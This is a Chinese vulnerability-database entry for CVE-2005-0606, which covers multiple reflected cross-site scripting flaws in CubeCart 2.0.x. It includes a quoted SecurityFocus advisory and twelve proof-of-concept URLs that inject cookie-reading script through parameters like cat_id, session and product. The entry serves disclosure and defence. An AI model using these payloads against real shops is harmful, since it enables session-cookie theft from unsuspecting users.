CubeCart多个跨站脚本攻击漏洞

CubeCart多个跨站脚本攻击漏洞

漏洞ID 1108486 漏洞类型 跨站脚本
发布时间 2005-02-25 更新时间 2005-10-20
图片[1]-CubeCart多个跨站脚本攻击漏洞-安全小百科CVE编号 CVE-2005-0606
图片[2]-CubeCart多个跨站脚本攻击漏洞-安全小百科CNNVD-ID CNNVD-200505-234
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/25162
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-234
|漏洞详情
CubeCart2.0.0至2.0.5的settings.inc.php当在多个PHP文件中使用时,其包含的跨站脚本攻击(XSS)漏洞允许远程攻击者通过(1)cat_id,(2)PHPSESSID,(3)view_doc,(4)product,(5)session,(6)catname,(7)search或(8)page参数来注入任意HTML或Web脚本。
|漏洞EXP
source: http://www.securityfocus.com/bid/12658/info


CubeCart is affected by multiple cross-site scripting vulnerabilities; an upgrade is available.

These issues exist because the application fails to properly sanitize user-supplied input.

As a result of these vulnerabilities, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

http://www.example.com/cubecart/?"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/view_order.php?cat_id=1"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/forgot_pass.php?catname='pruebas1'"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/index.php?cat_id=5"><body><p><h1>CubeCart XSS Pow@ !!!</h1></p>/<body>
http://www.example.com/cubecart/view_order.php?session=1"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/view_order.php?product=1"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/your_orders.php?cat_id="><script>document.write(document.cookie)</script>
http://www.example.com/cubecart/view_product.php?product=1"><script>alert(document.cookie);</script>
http://www.example.com/cubecart/tellafriend.php?product=1&session="><script>alert(document.cookie)</script>
http://www.example.com/cubecart/tellafriend.php?product=1"><script>document.write(document.cookie)</script>
http://www.example.com/cubecart/login.php?session="><script>alert(document.cookie);</script>
http://www.example.com/cubecart/search.php?search=".,script.alert(document.cookie)</script>
|参考资料

来源:BID
名称:12658
链接:http://www.securityfocus.com/bid/12658
来源:www.cubecart.com
链接:http://www.cubecart.com/site/forums/index.php?showtopic=6032
来源:XF
名称:cubecart-multiple-xss(20637)
链接:http://xforce.iss.net/xforce/xfdb/20637
来源:SECTRACK
名称:1013304
链接:http://securitytracker.com/id?1013304
来源:SECUNIA
名称:14416
链接:http://secunia.com/advisories/14416
来源:MISC
链接:http://lostmon.blogspot.com/2005/02/cubecart-20x-multiple-variable-xss.html

相关推荐: Lotus Domino Servers漏洞

Lotus Domino Servers漏洞 漏洞ID 1204435 漏洞类型 未知 发布时间 2002-04-22 更新时间 2002-04-22 CVE编号 CVE-2002-0037 CNNVD-ID CNNVD-200204-025 漏洞平台 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享